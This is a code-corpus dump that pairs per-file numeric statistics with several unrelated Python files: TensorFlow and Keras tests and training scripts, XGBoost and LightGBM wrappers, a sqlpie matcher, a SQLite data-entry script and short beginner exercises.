| 0.168
| 0
| 0
| 0
| 0
| 0.027739
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af621cd414c91141313b31734d2740e917380a97
| 6,772
|
py
|
Python
|
tensorflow_constrained_optimization/python/rates/subsettable_context_test.py
|
neelguha/tensorflow_constrained_optimization
|
46b34d1c2d6ec05ea1e46db3bcc481a81e041637
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_constrained_optimization/python/rates/subsettable_context_test.py
|
neelguha/tensorflow_constrained_optimization
|
46b34d1c2d6ec05ea1e46db3bcc481a81e041637
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_constrained_optimization/python/rates/subsettable_context_test.py
|
neelguha/tensorflow_constrained_optimization
|
46b34d1c2d6ec05ea1e46db3bcc481a81e041637
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 The TensorFlow Constrained Optimization Authors. All Rights
# Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
# ==============================================================================
"""Tests for subsettable_context.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tensorflow_constrained_optimization.python.rates import subsettable_context
def create_contexts():
"""Returns a pair of `SubsettableContext`s to use in tests.
We'll refer to the two contexts as "context1" and "context2". Both are subsets
of the same parent context, which has:
penalty_predicate = [1, 0, 1, 0, 1, 0, 1, 0, 1, 0]
constraint_predicate = [0, 1, 0, 1, 0, 1, 0, 1, 0, 1]
context1 is subsetted from the parent context using:
penalty_predicate1 = [0, 0, 1, 1, 1, 1, 0, 0, 0, 0]
constraint_predicate1 = [1, 1, 0, 0, 0, 0, 1, 1, 1, 1]
while context2 is subsetted from the parent context using:
penalty_predicate2 = [0, 0, 0, 0, 1, 1, 1, 1, 0, 0]
constraint_predicate2 = [1, 1, 1, 1, 0, 0, 0, 0, 1, 1]
Returns:
The pair (context1, context2).
"""
predictions = tf.constant(0.0, dtype=tf.float32, shape=(1,))
context = subsettable_context.rate_context(predictions)
penalty_predicate = tf.constant(
[True, False, True, False, True, False, True, False, True, False],
dtype=tf.bool)
constraint_predicate = tf.constant(
[False, True, False, True, False, True, False, True, False, True],
dtype=tf.bool)
context = context.subset(penalty_predicate, constraint_predicate)
penalty_predicate1 = tf.constant(
[False, False, True, True, True, True, False, False, False, False],
dtype=tf.bool)
constraint_predicate1 = tf.constant(
[True, True, False, False, False, False, True, True, True, True],
dtype=tf.bool)
penalty_predicate2 = tf.constant(
[False, False, False, False, True, True, True, True, False, False],
dtype=tf.bool)
constraint_predicate2 = tf.constant(
[True, True, True, True, False, False, False, False, True, True],
dtype=tf.bool)
context1 = context.subset(penalty_predicate1, constraint_predicate1)
context2 = context.subset(penalty_predicate2, constraint_predicate2)
return context1, context2
class SubsettableContextTest(tf.test.TestCase):
"""Tests for `SubsettableContext` class."""
def test_subset_of_subset(self):
"""Tests that taking the subset-of-a-subset works correctly."""
context1, context2 = create_contexts()
context1_penalty_predicate = context1.penalty_predicate.predicate
context1_constraint_predicate = context1.constraint_predicate.predicate
context2_penalty_predicate = context2.penalty_predicate.predicate
context2_constraint_predicate = context2.constraint_predicate.predicate
with self.session() as session:
session.run(tf.global_variables_initializer())
# Make sure that the subset of a subset ANDs the conditions together in
# condition1.
expected_penalty_predicate = np.array([0, 0, 1, 0, 1, 0, 0, 0, 0, 0],
dtype=np.float32)
expected_constraint_predicate = np.array([0, 1, 0, 0, 0, 0, 0, 1, 0, 1],
dtype=np.float32)
self.assertAllEqual(expected_penalty_predicate,
session.run(context1_penalty_predicate))
self.assertAllEqual(expected_constraint_predicate,
session.run(context1_constraint_predicate))
# Likewise in condition2.
expected_penalty_predicate = np.array([0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
dtype=np.float32)
expected_constraint_predicate = np.array([0, 1, 0, 1, 0, 0, 0, 0, 0, 1],
dtype=np.float32)
self.assertAllEqual(expected_penalty_predicate,
session.run(context2_penalty_predicate))
self.assertAllEqual(expected_constraint_predicate,
session.run(context2_constraint_predicate))
def test_and(self):
"""Tests `SubsettableContext`'s logical AND operator."""
context1, context2 = create_contexts()
and_context = context1 & context2
and_context_penalty_predicate = and_context.penalty_predicate.predicate
and_context_constraint_predicate = (
and_context.constraint_predicate.predicate)
with self.session() as session:
session.run(tf.global_variables_initializer())
# Make sure that AND applies only to the top-level subset.
expected_penalty_predicate = np.array([0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
dtype=np.float32)
expected_constraint_predicate = np.array([0, 1, 0, 0, 0, 0, 0, 0, 0, 1],
dtype=np.float32)
self.assertAllEqual(expected_penalty_predicate,
session.run(and_context_penalty_predicate))
self.assertAllEqual(expected_constraint_predicate,
session.run(and_context_constraint_predicate))
def test_or(self):
"""Tests `SubsettableContext`'s logical OR operator."""
context1, context2 = create_contexts()
or_context = context1 | context2
or_context_penalty_predicate = or_context.penalty_predicate.predicate
or_context_constraint_predicate = or_context.constraint_predicate.predicate
with self.session() as session:
session.run(tf.global_variables_initializer())
# Make sure that OR applies only to the top-level subset.
expected_penalty_predicate = np.array([0, 0, 1, 0, 1, 0, 1, 0, 0, 0],
dtype=np.float32)
expected_constraint_predicate = np.array([0, 1, 0, 1, 0, 0, 0, 1, 0, 1],
dtype=np.float32)
self.assertAllEqual(expected_penalty_predicate,
session.run(or_context_penalty_predicate))
self.assertAllEqual(expected_constraint_predicate,
session.run(or_context_constraint_predicate))
if __name__ == "__main__":
tf.test.main()
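The expected arrays in test_subset_of_subset are just the elementwise AND of the parent and child predicates; a quick standalone check of the first expectation:
import numpy as np
parent = np.array([1, 0, 1, 0, 1, 0, 1, 0, 1, 0])
child1 = np.array([0, 0, 1, 1, 1, 1, 0, 0, 0, 0])
assert (parent & child1).tolist() == [0, 0, 1, 0, 1, 0, 0, 0, 0, 0]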
| 42.591195
| 80
| 0.656379
| 837
| 6,772
| 5.135006
| 0.188769
| 0.023732
| 0.022336
| 0.016752
| 0.487436
| 0.397859
| 0.388087
| 0.388087
| 0.336901
| 0.278269
| 0
| 0.041675
| 0.238187
| 6,772
| 158
| 81
| 42.860759
| 0.791432
| 0.266834
| 0
| 0.348315
| 0
| 0
| 0.001637
| 0
| 0
| 0
| 0
| 0
| 0.089888
| 1
| 0.044944
| false
| 0
| 0.067416
| 0
| 0.134831
| 0.011236
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af6346ccaefda878793e2d456fe00155edd718ff
| 483
|
py
|
Python
|
m5.py
|
mohitalivenetsolutions/alivenet-python-training
|
19968bbec0b9a44884e0175414342a8ca4ebb1fd
|
[
"MIT"
] | null | null | null |
m5.py
|
mohitalivenetsolutions/alivenet-python-training
|
19968bbec0b9a44884e0175414342a8ca4ebb1fd
|
[
"MIT"
] | 1
|
2018-07-17T17:09:38.000Z
|
2018-07-17T17:09:38.000Z
|
m5.py
|
mohitalivenetsolutions/alivenet-python-training
|
19968bbec0b9a44884e0175414342a8ca4ebb1fd
|
[
"MIT"
] | null | null | null |
#list
list=["Apple","Mango","Banana","Pine Apple","Plum"]
for lst in list :
if lst=='Banana':
continue
else:
print(lst)
#tuples
tpls = ("apple", "banana", "cherry","banana",)
print("Tuples:",tpls)
#Set
st = set(("apple", "banana", "cherry"))
st.add("damson")
st.remove("banana")
print("Set:",st)
print("Length",len(st))
#Dictionary
dct = dict(apple="green", banana="yellow", cherry="red")
del(dct["banana"])
print("Dictionary:",dct)
| 20.125
| 57
| 0.583851
| 62
| 483
| 4.548387
| 0.483871
| 0.117021
| 0.120567
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.182195
| 483
| 23
| 58
| 21
| 0.713924
| 0.047619
| 0
| 0
| 0
| 0
| 0.314088
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.3125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af63f358d135bd02b0acb291df904454267fe7f6
| 546
|
py
|
Python
|
pokemon.py
|
videogamerm/pokemon_database
|
e33cb420fdd1053d55d178e230c095dedcffff76
|
[
"MIT"
] | null | null | null |
pokemon.py
|
videogamerm/pokemon_database
|
e33cb420fdd1053d55d178e230c095dedcffff76
|
[
"MIT"
] | null | null | null |
pokemon.py
|
videogamerm/pokemon_database
|
e33cb420fdd1053d55d178e230c095dedcffff76
|
[
"MIT"
] | null | null | null |
import sqlite3
import time
import random
conn = sqlite3.connect('pokemon.db')
c = conn.cursor()
id = 0
def dynamic_data_entry():
name = input ("Name: ")
health = input ("Health: ")
stage = input ("Stage:")
ptype = input("Type: ")
retreat = input ("Retreat: ")
year = input ("Year: ")
c.execute("INSERT INTO pm VALUES ( ?,?,?,?,?,?,? )",
(id,name,health,stage,ptype,retreat,year))
conn.commit()
for i in range(600):
dynamic_data_entry()
time.sleep(1)
id += 1
c.close()
conn.close()
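The script assumes a `pm` table with seven columns already exists; a plausible bootstrap (column names and types are inferred from the input prompts above, so they are assumptions):
import sqlite3
conn = sqlite3.connect('pokemon.db')
conn.execute("""CREATE TABLE IF NOT EXISTS pm
                (id INTEGER, name TEXT, health TEXT, stage TEXT,
                 ptype TEXT, retreat TEXT, year TEXT)""")
conn.commit()
conn.close()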
| 17.0625
| 56
| 0.580586
| 70
| 546
| 4.471429
| 0.542857
| 0.070288
| 0.102236
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019324
| 0.241758
| 546
| 31
| 57
| 17.612903
| 0.736715
| 0
| 0
| 0
| 0
| 0
| 0.164835
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.136364
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af6432d71105fd52d5f472fb3ff046ac0d326424
| 2,603
|
py
|
Python
|
sqlpie/services/matcher.py
|
lessaworld/sqlpie
|
22cac1fc7f9cb939e823058f84a68988e03ab239
|
[
"MIT"
] | 3
|
2016-01-27T19:49:23.000Z
|
2020-08-18T13:59:02.000Z
|
sqlpie/services/matcher.py
|
lessaworld/sqlpie
|
22cac1fc7f9cb939e823058f84a68988e03ab239
|
[
"MIT"
] | null | null | null |
sqlpie/services/matcher.py
|
lessaworld/sqlpie
|
22cac1fc7f9cb939e823058f84a68988e03ab239
|
[
"MIT"
] | 1
|
2016-02-01T01:57:54.000Z
|
2016-02-01T01:57:54.000Z
|
# -*- coding: utf-8 -*-
"""
SQLpie License (MIT License)
Copyright (c) 2011-2016 André Lessa, http://sqlpie.com
See LICENSE file.
"""
from flask import g
import sqlpie
import math, json
class Matcher(object):
def __init__(self):
pass
@staticmethod
def match_single(source_bucket, document_id, search_bucket, max_matches=1, filter_query=""):
# Read Doc, Get top N top idf terms, and use those in the query.
engine = sqlpie.Searcher(filter_query)
results = engine.run_docmatching(source_bucket, document_id, search_bucket, max_matches)
return results
@staticmethod
def match_all(source_bucket, search_bucket, max_matches, filter_query, output_predicate=None):
engine = sqlpie.Searcher(filter_query)
num_observations = 0
if output_predicate is None:
output_predicate = "match_" + source_bucket.lower().strip() + "_" + search_bucket.lower().strip()
# Delete observations from specific predicate (match_<bucket>_<search_bucket>)
sqlpie.Observation.remove({"predicate":output_predicate})
sb = sqlpie.Bucket(source_bucket)
sql = ["bucket_id = UNHEX(%s)", sb.bucket_id]
docs = sqlpie.Document.select(sql)
is_encoded_document_id = True
# Loop each document from bucket
for d in docs:
document_id = d[1]
# Get scored best matches for each document
results = engine.run_docmatching(source_bucket, document_id, search_bucket, max_matches, is_encoded_document_id)
observations = []
for r in results:
# Store scored matches/results as observations
num_observations = num_observations + 1
observation = {"subject_bucket":source_bucket, "object_bucket":search_bucket, "subject_id":document_id, \
"predicate":output_predicate, "object_id":r[sqlpie.Document.ID_FIELD], \
"value":r[sqlpie.Document.SCORE_FIELD]}
observations.append(sqlpie.Observation(observation))
if len(observations) > 0:
sqlpie.Observation.add_multiple(observations)
return (num_observations, output_predicate)
@staticmethod
def match_document(document, search_bucket, max_matches, filter_query):
term_ids = sqlpie.Indexer.parse_features(document, False, True)
engine = sqlpie.Searcher(filter_query)
results = engine.run_docmatching(None, None, search_bucket, max_matches, False, term_ids)
return results
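A hypothetical call; the bucket names are placeholders, and a configured sqlpie backend (plus Flask application context) is required:
num_obs, predicate = Matcher.match_all(
    source_bucket="articles",
    search_bucket="archive",
    max_matches=3,
    filter_query="",
)
print(predicate)  # "match_articles_archive" when no output_predicate is passed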
| 40.671875
| 124
| 0.659624
| 300
| 2,603
| 5.473333
| 0.353333
| 0.065773
| 0.054811
| 0.08039
| 0.226553
| 0.207674
| 0.167479
| 0.167479
| 0.140682
| 0.08648
| 0
| 0.007176
| 0.25048
| 2,603
| 63
| 125
| 41.31746
| 0.834444
| 0.151364
| 0
| 0.195122
| 0
| 0
| 0.044211
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097561
| false
| 0.02439
| 0.073171
| 0
| 0.268293
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af664d7b09e7e9a2561541c3ca78ef9e440f0b18
| 5,554
|
py
|
Python
|
src/mlregression/estimator/boosting.py
|
muhlbach/ml-regression
|
59dfa5acc9841729d632030492e029bb329ce3ed
|
[
"MIT"
] | 1
|
2021-11-12T22:45:32.000Z
|
2021-11-12T22:45:32.000Z
|
src/mlregression/estimator/boosting.py
|
muhlbach/ml-regression
|
59dfa5acc9841729d632030492e029bb329ce3ed
|
[
"MIT"
] | 1
|
2021-11-15T22:14:10.000Z
|
2021-11-16T15:56:14.000Z
|
src/mlregression/estimator/boosting.py
|
muhlbach/ml-regression
|
59dfa5acc9841729d632030492e029bb329ce3ed
|
[
"MIT"
] | null | null | null |
#------------------------------------------------------------------------------
# Libraries
#------------------------------------------------------------------------------
# Standard
import numpy as np
import xgboost as xgb
import lightgbm as lgbm
#------------------------------------------------------------------------------
# XGBoost
#------------------------------------------------------------------------------
class XGBRegressor(xgb.XGBRegressor):
"""
This class copies verbatim the XGBoost regressor as of version 1.5.0
See: https://xgboost.readthedocs.io/en/latest/python/python_api.html#module-xgboost.sklearn
"""
# -------------------------------------------------------------------------
# Constructor function
# -------------------------------------------------------------------------
def __init__(self,
n_estimators=200, # Default 100
max_depth=None,
learning_rate=1,
verbosity=0,
objective='reg:squarederror',
booster=None,
tree_method=None,
n_jobs=1,
gamma=None,
min_child_weight=None,
max_delta_step=None,
subsample=0.8,
colsample_bytree=None,
colsample_bylevel=None,
colsample_bynode=0.8,
reg_alpha=None,
reg_lambda=1e-05,
scale_pos_weight=None,
base_score=None,
random_state=1991,
missing=np.nan,
num_parallel_tree=None,
monotone_constraints=None,
interaction_constraints=None,
importance_type='gain',
gpu_id=None,
validate_parameters=None,
enable_categorical=False,
predictor=None
):
super().__init__(
n_estimators=n_estimators,
max_depth=max_depth,
learning_rate=learning_rate,
verbosity=verbosity,
booster=booster,
tree_method=tree_method,
n_jobs=n_jobs,
gamma=gamma,
min_child_weight=min_child_weight,
max_delta_step=max_delta_step,
subsample=subsample,
colsample_bytree=colsample_bytree,
colsample_bylevel=colsample_bylevel,
colsample_bynode=colsample_bynode,
reg_alpha=reg_alpha,
reg_lambda=reg_lambda,
scale_pos_weight=scale_pos_weight,
base_score=base_score,
random_state=random_state,
missing=missing,
num_parallel_tree=num_parallel_tree,
monotone_constraints=monotone_constraints,
interaction_constraints=interaction_constraints,
importance_type=importance_type,
gpu_id=gpu_id,
validate_parameters=validate_parameters,
enable_categorical=enable_categorical,
predictor=predictor,
)
# # Lazy implementation:
# class XGBRegressor(xgb.XGBRegressor):
# def __init__(self, **kwargs):
# super().__init__(**kwargs)
#------------------------------------------------------------------------------
# LightGBM
#------------------------------------------------------------------------------
class LGBMRegressor(lgbm.LGBMRegressor):
"""
This class copies verbatim the LightGBM regressor as of version 3.2.1
See: https://lightgbm.readthedocs.io/en/latest/pythonapi/lightgbm.LGBMRegressor.html#lightgbm-lgbmregressor
"""
# -------------------------------------------------------------------------
# Constructor function
# -------------------------------------------------------------------------
def __init__(self,
boosting_type='gbdt',
num_leaves=31,
max_depth=-1,
learning_rate=0.1,
n_estimators=100,
subsample_for_bin=200000,
objective='regression',
class_weight=None,
min_split_gain=0.0,
min_child_weight=0.001,
min_child_samples=20,
subsample=1.0,
subsample_freq=0,
colsample_bytree=1.0,
reg_alpha=0.0,
reg_lambda=0.0,
random_state=None,
n_jobs=1,
silent='warn',
importance_type='split'
):
super().__init__(
boosting_type=boosting_type,
num_leaves=num_leaves,
max_depth=max_depth,
learning_rate=learning_rate,
n_estimators=n_estimators,
subsample_for_bin=subsample_for_bin,
objective=objective,
class_weight=class_weight,
min_split_gain=min_split_gain,
min_child_weight=min_child_weight,
min_child_samples=min_child_samples,
subsample=subsample,
subsample_freq=subsample_freq,
colsample_bytree=colsample_bytree,
reg_alpha=reg_alpha,
reg_lambda=reg_lambda,
random_state=random_state,
n_jobs=n_jobs,
silent=silent,
importance_type=importance_type
)
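A minimal usage sketch on synthetic data; both wrappers keep the scikit-learn fit/predict interface of their parents:
import numpy as np
X = np.random.rand(200, 5)
y = X @ np.array([1.0, -2.0, 0.5, 0.0, 3.0]) + 0.1 * np.random.randn(200)
model = XGBRegressor(n_estimators=20)
model.fit(X, y)
print(model.predict(X[:3]))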
| 39.112676
| 111
| 0.46507
| 453
| 5,554
| 5.335541
| 0.267108
| 0.029789
| 0.034754
| 0.021101
| 0.13405
| 0.084402
| 0.061233
| 0.061233
| 0
| 0
| 0
| 0.015808
| 0.339395
| 5,554
| 142
| 112
| 39.112676
| 0.642954
| 0.239287
| 0
| 0.254545
| 0
| 0
| 0.010322
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018182
| false
| 0
| 0.063636
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af66914d6ab60784b54d7bda3a416c150d4d2a44
| 5,125
|
py
|
Python
|
ICPAR/trainer.py
|
RichardLeeK/CNM
|
a3c15cb0a0373d6ad03c5a815a7e020f90ab8522
|
[
"Apache-2.0"
] | null | null | null |
ICPAR/trainer.py
|
RichardLeeK/CNM
|
a3c15cb0a0373d6ad03c5a815a7e020f90ab8522
|
[
"Apache-2.0"
] | null | null | null |
ICPAR/trainer.py
|
RichardLeeK/CNM
|
a3c15cb0a0373d6ad03c5a815a7e020f90ab8522
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D, Dense, Dropout, Flatten
import keras.backend as K
import random
import os
import sys
sys.setrecursionlimit(1000000)
def data_load_module(tf):
file = open('int/' + tf + '_1_int_rev.csv')
lines = file.readlines()
file.close()
arr = np.load('npy/' + tf + '.abp.t.npy')
x = []; y = []; tl = []
for line in lines:
sl = line.split(',')
sid = int(sl[0])
#if float(sl[2]) > 60: continue
if int(sl[1]) == 1:
y.append([1, 0])
else:
y.append([0, 1])
tl.append(float(sl[2]))
x.append(arr[sid])
return x, y, tl
def rejection(x, y, tl):
pos_idx = []
neg_idx = []
for i in range(len(y)):
if y[i][0] == 0:
pos_idx.append(i)
else:
neg_idx.append(i)
lp = len(pos_idx)
ln = len(neg_idx)
acc_cnt = lp / ln if lp > ln else ln / lp
tot_idx = []
if lp > ln:
tot_idx = pos_idx
for i in range(int(acc_cnt)):
tot_idx.extend(neg_idx)
else:
tot_idx = neg_idx
for i in range(int(acc_cnt)):
tot_idx.extend(pos_idx)
random.shuffle(tot_idx)
new_x = []
new_y = []
new_tl = []
for idx in tot_idx:
new_x.append(x[idx])
new_y.append(y[idx])
new_tl.append(tl[idx])
return new_x, new_y, new_tl
def data_load(train_list, test_list):
train_x = []; train_y = []; train_tl = []
for tf in train_list:
x, y, tl = data_load_module(tf)
train_x.extend(x); train_y.extend(y); train_tl.extend(tl)
train_x, train_y, train_tl = rejection(train_x, train_y, train_tl)
test_x = []; test_y = []; test_tl = []
for tf in test_list:
x, y, tl = data_load_module(tf)
test_x.extend(x); test_y.extend(y); test_tl.extend(tl)
return train_x, train_y, train_tl, test_x, test_y, test_tl
def fold_data_load(i):
    # Unused, incomplete stub: it only initializes empty training containers.
    train_x = []; train_y = []; train_tl = []
def create_model(ipt_dim):
model = Sequential()
model.add(Conv2D(32, kernel_size=(3, 3), activation='relu', input_shape=(ipt_dim, ipt_dim, 1)))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.25))
model.add(Dense(2, activation='softmax'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['binary_accuracy'])
return model
def performance_generator(tp, tn, fp, fn):
sen = tp / (tp + fn) if (tp + fn) > 0 else 0
spe = tn / (tn + fp) if (tn + fp) > 0 else 0
ppv = tp / (tp + fp) if (tp + fp) > 0 else 0
npv = tn / (tn + fn) if (tn + fn) > 0 else 0
npd = (sen + spe) / 2
acc = (tp + tn) / (tp + tn + fp + fn)
return [sen, spe, ppv, npv, npd, acc]
def counter(y):
pc = 0; nc = 0
for i in range(len(y)):
if round(y[i][0]) == 0:
pc += 1
else:
nc += 1
return pc, nc
def get_pred_performance(test_y, pred_y, time_line):
tp = 0; tn = 0; fp = 0; fn = 0;
tpt = 0; tnt = 0; fpt = 0; fnt = 0;
for i in range(len(pred_y)):
cp = round(pred_y[i][0])
ca = test_y[i][0]
if cp == ca:
if cp == 0:
tp += 1
tpt += time_line[i]
else:
tn += 1
tnt += time_line[i]
else:
if cp == 0:
fp += 1
fpt += time_line[i]
else:
fn += 1
fnt += time_line[i]
ca = performance_generator(tp, tn, fp, fn)
ta = performance_generator(tpt, tnt, fpt, fnt)
cs = str(tp) + ',' + str(tn) + ',' + str(fp) + ',' + str(fn)
for v in ca:
cs += ',' + str(v)
ts = str(tpt) + ',' + str(tnt) + ',' + str(fpt) + ',' + str(fnt)
for v in ta:
ts += ',' + str(v)
print('Count:' + cs)
print('Time:' + ts)
return cs + ',' + ts
def read_1_file(file, pos):
pid = file.split('.')[0].split('/')[-1]
f = open('int/'+pid+'_1_int_rev.csv')
lines = f.readlines()
f.close()
arr = np.load('npy/'+str(pos)+'/'+file)
x = []; y = []; tl = [];
for line in lines:
sl = line.split(',')
sid = int(sl[0])
if int(sl[1]) == 1:
y.append([1, 0])
else:
y.append([0, 1])
tl.append(float(sl[2]))
x.append(arr[sid])
return x, y, tl
def read_module(pos):
files = os.listdir('npy/' + str(pos))
test_x = []; test_y = []; test_tl = [];
train_x = []; train_y = []; train_tl = [];
for file in files:
if 'rep' in file:
if 'non' in file:
x, y, tl = read_1_file(file, pos)
test_x.extend(x); test_y.extend(y); test_tl.extend(tl)
else:
x, y, tl = read_1_file(file, pos)
train_x.extend(x); train_y.extend(y); train_tl.extend(tl)
return [train_x, train_y, train_tl], [test_x, test_y, test_tl]
if __name__=='__main__':
pos = 2
print(str(pos))
train, test = read_module(pos)
model = create_model(64)
model.fit(np.array(train[0]), np.array(train[1]), validation_data=(np.array(test[0]), np.array(test[1])), epochs=50)
model.save('net/CNN/'+str(pos)+'_CNN50.net')
pred = model.predict(np.array(test[0]))
sentence = get_pred_performance(test[1], pred, test[2])
pen = open('CNN_result.csv', 'a')
pen.write('\n' + str(pos) + ',' + sentence)
pen.close()
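A quick sanity check of the metric helper, not part of the original script: with 8 TP, 5 TN, 2 FP, 1 FN, sensitivity is 8/9 and accuracy 13/16:
sen, spe, ppv, npv, npd, acc = performance_generator(8, 5, 2, 1)
assert abs(sen - 8 / 9) < 1e-9
assert abs(acc - 13 / 16) < 1e-9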
| 26.832461
| 118
| 0.575415
| 872
| 5,125
| 3.222477
| 0.182339
| 0.006406
| 0.012811
| 0.029893
| 0.367972
| 0.339502
| 0.292883
| 0.233808
| 0.202491
| 0.202491
| 0
| 0.027145
| 0.238049
| 5,125
| 190
| 119
| 26.973684
| 0.692446
| 0.005854
| 0
| 0.269461
| 0
| 0
| 0.037299
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05988
| false
| 0
| 0.041916
| 0
| 0.155689
| 0.017964
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af6cc52ba6e57b394d26f12154df2f51b1b57cc5
| 636
|
py
|
Python
|
test/test_layers/test_flatten.py
|
radu-dogaru/numpyCNN
|
efe8749d7a35156ff9e67e7cc6df62a8077bf2ea
|
[
"MIT"
] | 19
|
2019-11-08T22:50:32.000Z
|
2022-03-14T22:29:21.000Z
|
test/test_layers/test_flatten.py
|
radu-dogaru/numpyCNN
|
efe8749d7a35156ff9e67e7cc6df62a8077bf2ea
|
[
"MIT"
] | null | null | null |
test/test_layers/test_flatten.py
|
radu-dogaru/numpyCNN
|
efe8749d7a35156ff9e67e7cc6df62a8077bf2ea
|
[
"MIT"
] | 7
|
2020-06-15T08:03:41.000Z
|
2021-10-01T11:22:58.000Z
|
import unittest
import numpy as np
from src.layers.flatten import Flatten
class TestFlatten(unittest.TestCase):
def test_flatten(self):
batch_size = 10
n_h, n_w, n_c = 32, 32, 3
a_prev = np.random.randn(batch_size, n_h, n_w, n_c)
f = Flatten()
f.init((n_h, n_w, n_c))
self.assertEqual(f.get_output_dim(), n_h * n_w * n_c)
self.assertTupleEqual(f.forward(a_prev, False).shape, (batch_size, n_h * n_w * n_c))
da, _, _ = f.backward(a_prev)
self.assertTupleEqual(da.shape, (batch_size, n_h, n_w, n_c))
np.testing.assert_array_almost_equal(a_prev, da)
| 30.285714
| 92
| 0.641509
| 109
| 636
| 3.431193
| 0.412844
| 0.032086
| 0.048128
| 0.064171
| 0.216578
| 0.216578
| 0.200535
| 0.147059
| 0.106952
| 0
| 0
| 0.014433
| 0.237421
| 636
| 20
| 93
| 31.8
| 0.756701
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.266667
| 1
| 0.066667
| false
| 0
| 0.2
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af6febf89f847660f4b9e84d576a390734dbb67d
| 2,214
|
py
|
Python
|
input_fn/input_fn_2d/data_gen_2dt/data_anaylzer.py
|
JochenZoellner/tf_neiss-1
|
c91019e5bce6d3c7512237eec5ea997fd95304ac
|
[
"Apache-2.0"
] | null | null | null |
input_fn/input_fn_2d/data_gen_2dt/data_anaylzer.py
|
JochenZoellner/tf_neiss-1
|
c91019e5bce6d3c7512237eec5ea997fd95304ac
|
[
"Apache-2.0"
] | 1
|
2020-08-07T13:04:43.000Z
|
2020-08-10T12:32:46.000Z
|
input_fn/input_fn_2d/data_gen_2dt/data_anaylzer.py
|
JochenZoellner/tf_neiss-1
|
c91019e5bce6d3c7512237eec5ea997fd95304ac
|
[
"Apache-2.0"
] | 1
|
2019-12-16T15:46:45.000Z
|
2019-12-16T15:46:45.000Z
|
import os
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
import input_fn.input_fn_2d.data_gen_2dt.data_gen_t2d_util.tfr_helper as tfr_helper
os.environ["CUDA_VISIBLE_DEVICES"] = ""
tf.enable_eager_execution()
if __name__ == "__main__":
print("run IS2d_triangle")
# prefix = "val"
